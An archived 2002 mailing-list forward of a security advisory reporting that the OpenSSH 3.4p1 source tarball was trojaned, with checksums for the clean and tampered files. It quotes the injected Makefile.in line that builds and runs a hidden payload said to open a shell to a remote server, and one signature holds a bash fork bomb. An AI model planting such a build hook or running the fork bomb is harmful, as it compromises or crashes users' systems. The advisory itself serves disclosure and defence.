From owner-freebsd-current  Thu Aug  1 14:10:49 2002
Delivered-To: freebsd-current@freebsd.org
Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125])
	by hub.freebsd.org (Postfix) with ESMTP
	id 1D66F37B400; Thu,  1 Aug 2002 14:10:13 -0700 (PDT)
Received: from prserv.net (out2.prserv.net [32.97.166.32])
	by mx1.FreeBSD.org (Postfix) with ESMTP
	id 6D53E43E86; Thu,  1 Aug 2002 14:10:12 -0700 (PDT)
	(envelope-from kdagee@attglobal.net)
Received: from enterprise.attglobal.net (slip-32-100-100-68.wa.us.prserv.net[32.100.100.68])
          by prserv.net (out2) with SMTP
          id <20020801211009202050bag9e>; Thu, 1 Aug 2002 21:10:10 +0000
Message-Id: <5.1.0.14.0.20020804140610.040fcd10@pop1.attglobal.net>
X-Sender: usinet.kdagee@pop1.attglobal.net
X-Mailer: QUALCOMM Windows Eudora Version 5.1
Date: Sun, 04 Aug 2002 14:07:09 -0700
To: FreeBSD-Questions@FreeBSD.ORG, freebsd-current@freebsd.org
From: Karl Agee <kdagee@attglobal.net>
Subject: Fwd: <3CLUG> !!!! [mikael.olsson@clavister.com:
  openssh-3.4p1.tar.gz distribution recently trojaned] !!!!
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"; format=flowed
Sender: owner-freebsd-current@FreeBSD.ORG
Precedence: bulk
List-ID: <freebsd-current.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
List-Help: <mailto:majordomo@FreeBSD.ORG?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo@FreeBSD.ORG?subject=subscribe%20freebsd-current>
List-Unsubscribe: <mailto:majordomo@FreeBSD.ORG?subject=unsubscribe%20freebsd-current>
X-Loop: FreeBSD.ORG

FYI....from my Linux User Group maillist.

--karl

>X-Authentication-Warning: quince.tricity.wsu.edu: majordomo set sender to 
>owner-3clug@www.3clug.org using -f
>Date: Thu, 1 Aug 2002 13:20:48 -0700
>From: Ed <ekg@tricity.wsu.edu>
>To: 3clug@3clug.org
>Subject: <3CLUG> !!!! [mikael.olsson@clavister.com: openssh-3.4p1.tar.gz 
>distribution recently trojaned] !!!!
>Mail-Followup-To: 3clug@3clug.org
>User-Agent: Mutt/1.2.5.1i
>Sender: owner-3clug@quince.tricity.wsu.edu
>
>
>if you didn't know this already, some copies of the source distribution
>of openssh are *trojaned*!  the _untrojaned_ version has this md5 sum:
>459c1d0262e939d6432f193c7a4ba8a8 (use md5sum openssh-3.4p1.tar.gz to
>check it).  the trojan horse connects to a computer in australia and
>opens a shell on the local machine.
>
>   Ed
>
>----- Forwarded message from Mikael Olsson <mikael.olsson@clavister.com> -----
>
>Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
>Precedence: bulk
>List-Id: <bugtraq.list-id.securityfocus.com>
>List-Post: <mailto:bugtraq@securityfocus.com>
>List-Help: <mailto:bugtraq-help@securityfocus.com>
>List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
>List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
>Delivered-To: mailing list bugtraq@securityfocus.com
>Delivered-To: moderator for bugtraq@securityfocus.com
>Date: Thu, 01 Aug 2002 13:20:47 +0200
>From: Mikael Olsson <mikael.olsson@clavister.com>
>Organization: Clavister AB
>To: bugtraq@securityfocus.com
>Subject: openssh-3.4p1.tar.gz distribution recently trojaned
>X-MailScanner: Found to be clean
>
>
>From
>http://docs.freebsd.org/cgi/getmsg.cgi?fetch=394609+0+current/freebsd-security
>
>----- Forwarded message from Edwin Groothuis <edwin@mavetju.org> -----
>
>Date: Thu, 1 Aug 2002 16:55:51 +1000
>From: Edwin Groothuis <edwin@mavetju.org>
>To: incidents@securityfocus.com
>Subject: openssh-3.4p1.tar.gz trojaned
>
>Greetings,
>
>Just want to inform you that the OpenSSH package op ftp.openbsd.org
>(and probably all its mirrors now) it trojaned:
>
>     ftp://ftp.openbsd.org/pub/OpenBSD/OpenSSH/portable/openssh-3.4p1.tar.gz
>
>The OpenBSD people have been informed about it (via email to
>deraadt@openbsd.org and via irc.openprojects.org/#openbsd)
>
>
>The changed files are openssh-3.4p1/openbsd-compat/Makefile.in:
>  all: libopenbsd-compat.a
>+       @ $(CC) bf-test.c -o bf-test; ./bf-test>bf-test.out; sh
>./bf-test.out &
>
>bf-test.c[1] is nothing more than a wrapper which generates a
>shell-script[2] which compiles itself and tries to connect to an
>server running on 203.62.158.32:6667 (web.snsonline.net).
>
>[1] http://www.mavetju.org/~edwin/bf-test.c
>[2] http://www.mavetju.org/~edwin/bf-output.sh
>
>This is the md5 checksum of the openssh-3.4p1.tar.gz in the FreeBSD
>ports system:
>     MD5 (openssh-3.4p1.tar.gz) = 459c1d0262e939d6432f193c7a4ba8a8
>
>This is the md5 checksum of the trojaned openssh-3.4p1.tar.gz:
>     MD5 (openssh-3.4p1.tar.gz) = 3ac9bc346d736b4a51d676faa2a08a57
>
>Edwin
>
>--
>Edwin Groothuis      |            Personal website: http://www.MavEtJu.org
>edwin@mavetju.org    |    Weblog: http://www.mavetju.org/weblog/weblog.php
>bash$ :(){ :|:&};:   | Interested in MUDs? http://www.FatalDimensions.org/
>
>----- End forwarded message -----



To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-current" in the body of the message